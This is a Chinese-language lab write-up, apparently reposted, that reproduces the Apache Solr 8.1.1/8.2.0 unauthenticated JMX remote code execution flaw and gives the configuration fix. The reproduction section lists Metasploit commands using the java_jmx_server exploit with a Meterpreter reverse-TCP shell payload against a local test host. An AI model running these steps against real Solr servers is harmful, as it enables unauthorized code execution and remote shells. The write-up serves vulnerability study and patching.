Apache Solr JMX服務遠程代碼執行漏洞復現


0x00 漏洞介紹

該漏洞源於默認配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置選項存在安全風險。
Apache Solr的8.1.1和8.2.0版本的自帶配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS="true"選項。
如果使用受影響版本中的默認solr.in.sh文件,那么將啟用JMX監視並將其暴露在RMI_PORT上(默認值= 18983),
並且無需進行任何身份驗證。 如果防火牆中的入站流量打開了此端口,則具有Solr節點網絡訪問權限的任何人都將能夠訪問JMX,
並且可以上傳惡意代碼在Solr服務器上執行。該漏洞不影響Windows系統的用戶,僅影響部分版本的Linux用戶。

0x01 影響版本

Apache Solr8.1.1和8.2.0版本

0x02 漏洞危害

如果受害者使用了該默認配置,則會在默認端口18983開放JMX服務,且默認未開啟認證。任何可訪問此端口的攻擊者可利用此漏洞向受影響服務發起攻擊,執行任意代碼。

0x03 准備工作

1) 搭建環境
安裝Apache Solr 8.20
wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip


2) 啟動環境

0x04 漏洞復現

1) 訪問默認端口 8993 出現以下界面正面漏洞環境搭建成功


2) 攻擊機操作

use exploit/multi/misc/java_jmx_server
set RHOSTS 127.0.0.1
set RPORTS 18983
set payload java/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 6666
run

0x05 修復方案

將solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS選項設置為false,然后重啟Solr服務。

0x06 參考鏈接

https://www.t00ls.net/articles-53901.html
https://github.com/jas502n/CVE-2019-12409


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM